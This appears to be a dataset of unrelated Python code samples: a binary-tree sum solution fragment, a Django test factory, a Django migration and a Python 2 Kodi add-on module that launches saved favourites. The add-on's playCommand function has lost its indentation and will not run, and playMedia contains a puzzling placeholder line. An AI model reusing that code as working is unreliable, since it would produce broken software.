    """Sum Root to Leaf Numbers: every root-to-leaf path spells a
    decimal number (most significant digit at the root); return the
    sum of all such numbers.
    """

    def solve(self, root, curr):
        """DFS helper: *curr* is the number built along the path so far."""
        if root is None:  # was `== None`; identity check is the idiom
            return 0
        curr = curr * 10 + root.val
        if not root.left and not root.right:
            # Leaf node: the path number is complete.
            return curr
        return self.solve(root.left, curr) + self.solve(root.right, curr)

    def sumNumbers(self, root: "TreeNode") -> int:
        """Return the sum of all root-to-leaf numbers in the tree.

        The annotation is a forward reference: TreeNode is defined by
        the judge environment, not this module.
        """
        return self.solve(root, 0)
| 592 | 188 |
from unittest.mock import patch
import factory
from mailinglist.models import Subscriber
class SubscriberFactory(factory.DjangoModelFactory):
    """Factory for Subscriber test fixtures.

    Overrides ``_create`` so that the task which sends the confirmation
    email is patched out while the model instance is saved -- creating
    a test subscriber must never trigger real email.
    """
    # Unique, well-formed email per generated instance.
    email = factory.Sequence(lambda n: 'foo.%d@example.com' % n)

    class Meta:
        model = Subscriber

    @classmethod
    def _create(cls, model_class, *args, **kwargs):
        # Patch applies only for the duration of the save.
        with patch('mailinglist.models.tasks.'
                   'send_confirmation_email_to_subscriber'):
            return super()._create(model_class=model_class, *args, **kwargs)
| 511 | 155 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-01 08:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make ``WildlifeLicenceType.code_slug`` a unique SlugField
    (max_length=64). Auto-generated migration; do not edit by hand.
    """

    dependencies = [
        ('wl_main', '0005_wildlifelicence_locations'),
    ]

    operations = [
        migrations.AlterField(
            model_name='wildlifelicencetype',
            name='code_slug',
            field=models.SlugField(max_length=64, unique=True),
        ),
    ]
| 486 | 179 |
#
# Copyright (C) 2014-
# Sean Poyser (seanpoyser@gmail.com)
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with XBMC; see the file COPYING. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import xbmc
import xbmcgui
import xbmcaddon
import favourite
import utils
# Convenience aliases onto the shared utils module.
ADDON = utils.ADDON
ADDONID = utils.ADDONID
# True when running on the "Frodo" XBMC release (needs the workarounds below).
FRODO = utils.FRODO

# Launch-mode constants describing how a favourite should be executed.
PLAYMEDIA_MODE = utils.PLAYMEDIA_MODE
ACTIVATEWINDOW_MODE = utils.ACTIVATEWINDOW_MODE
RUNPLUGIN_MODE = utils.RUNPLUGIN_MODE
ACTION_MODE = utils.ACTION_MODE
SHOWPICTURE_MODE = utils.SHOWPICTURE_MODE

# User setting: route playlist favourites through the playlist module.
PLAY_PLAYLISTS = ADDON.getSetting('PLAY_PLAYLISTS') == 'true'
def getParentCommand(cmd):
    """Return the root plugin:// path of *cmd*'s add-on, or None.

    NOTE(review): ``parents`` is always empty here, so the
    ``md5 not in parents`` test always fires and this function
    currently returns None unconditionally -- everything after that
    check is dead code. Presumably ``parents`` was meant to be
    populated from some whitelist; confirm the intent before
    re-enabling.
    """
    parents = []
    import re
    try:
        # Extract the add-on id from e.g. plugin://plugin.video.foo/?...
        plugin = re.compile('plugin://(.+?)/').search(cmd.replace('?', '/')).group(1)
        md5 = utils.generateMD5(plugin)
        if md5 not in parents:
            return None
        # Only return the parent path when the add-on is actually installed.
        if xbmc.getCondVisibility('System.HasAddon(%s)' % plugin) == 1:
            return 'plugin://%s' % plugin
    except Exception, e:
        pass
    return None
def processParentCommand(cmd):
    """Navigate the container to *cmd*'s parent plugin path, if any.

    Container.Update is asynchronous, so poll until the folder path
    reflects the new location. The wait is bounded (~10s): the previous
    version looped forever and could hang the add-on if the navigation
    never completed.
    """
    parent = getParentCommand(cmd)
    if not parent:
        return
    xbmc.executebuiltin('Container.Update(%s)' % parent)
    for _ in range(200):
        if xbmc.getInfoLabel('Container.FolderPath').startswith(parent):
            break
        xbmc.sleep(50)
def playCommand(originalCmd, contentMode=False):
try:
xbmc.executebuiltin('Dialog.Close(busydialog)') #Isengard fix
cmd = favourite.tidy(originalCmd)
if cmd.lower().startswith('executebuiltin'):
cmd = cmd.replace('"', '')
cmd = cmd.lower()
cmd = cmd.replace('"', '')
cmd = cmd.replace('executebuiltin(', '')
if cmd.endswith('))'):
cmd = cmd[:-1]
if cmd.endswith(')') and '(' not in cmd:
cmd = cmd[:-1]
#if a 'Super Favourite' favourite just do it
#if ADDONID in cmd:
# return xbmc.executebuiltin(cmd)
#if in contentMode just do it
if contentMode:
xbmc.executebuiltin('ActivateWindow(Home)') #some items don't play nicely if launched from wrong window
if cmd.lower().startswith('activatewindow'):
cmd = cmd.replace('")', '",return)') #just in case return is missing
return xbmc.executebuiltin(cmd)
if cmd.startswith('RunScript'):
#workaround bug in Frodo that can cause lock-up
#when running a script favourite
if FRODO:
xbmc.executebuiltin('ActivateWindow(Home)')
if PLAY_PLAYLISTS:
import playlist
if playlist.isPlaylist(cmd):
return playlist.play(cmd)
if 'ActivateWindow' in cmd:
return activateWindowCommand(cmd)
if 'PlayMedia' in cmd:
return playMedia(originalCmd)
xbmc.executebuiltin(cmd)
except Exception, e:
utils.log('Error in playCommand')
utils.log('Command: %s' % cmd)
utils.log('Error: %s' % str(e))
def activateWindowCommand(cmd):
    """Run an ActivateWindow(...) favourite.

    The target window is only (re)activated when it differs from the
    current one; any folder path carried by the command is then opened
    with Container.Update. The file manager window is special-cased and
    receives the command verbatim.
    """
    head, sep, tail = cmd.partition(',')

    # Special case: file manager (window id 10003) must be run untouched.
    if '10003' in head or 'filemanager' in head.lower():
        xbmc.executebuiltin(cmd)
        return

    if sep:
        activate = head + ',return)'
        folder = tail[:-1]
    else:
        activate = head
        folder = None

    # Only switch windows when we are not already on the target one.
    current_id = str(xbmcgui.getCurrentWindowId())
    if current_id not in activate:
        xbmc.executebuiltin(activate)

    if folder:
        xbmc.executebuiltin('Container.Update(%s)' % folder)
def playMedia(original):
    """Run a PlayMedia favourite according to its stored launch mode.

    The mode option selects between direct PlayMedia, ShowPicture,
    ActivateWindow+Container.Update and RunPlugin handling; anything
    unrecognised falls through to executing the command as-is.
    """
    import re
    cmd = favourite.tidy(original) #.replace(',', '') #remove spurious commas
    processParentCommand(cmd)
    # Launch mode stored as an option on the favourite; default 0.
    try: mode = int(favourite.getOption(original, 'mode'))
    except: mode = 0
    if mode == PLAYMEDIA_MODE:
        cmd = 'PlayMedia(%s)' % plugin if False else cmd  # NOTE(review): placeholder? original just executes cmd
        xbmc.executebuiltin(cmd)
        return
    # NOTE(review): assumes cmd contains a double-quoted path; if not,
    # .search(...) returns None and .group(1) raises AttributeError.
    plugin = re.compile('"(.+?)"').search(cmd).group(1)
    if mode == SHOWPICTURE_MODE:
        xbmc.executebuiltin('ShowPicture(%s)' % plugin)
        return
    # NOTE(review): the regex group is non-empty by construction, so this
    # guard can never fire -- kept for safety.
    if len(plugin) < 1:
        xbmc.executebuiltin(cmd)
        return
    if mode == ACTIVATEWINDOW_MODE:
        # Window id stored alongside the favourite; 10025 (videos) default.
        try: winID = int(favourite.getOption(original, 'winID'))
        except: winID = 10025
        #check if it is a different window and if so activate it
        id = xbmcgui.getCurrentWindowId()
        if id != winID :
            xbmc.executebuiltin('ActivateWindow(%d)' % winID)
        cmd = 'Container.Update(%s)' % plugin
        xbmc.executebuiltin(cmd)
        return
    if mode == RUNPLUGIN_MODE:
        cmd = 'RunPlugin(%s)' % plugin
        xbmc.executebuiltin(cmd)
        return
    #if all else fails just execute it
    xbmc.executebuiltin(cmd)
| 5,565 | 1,895 |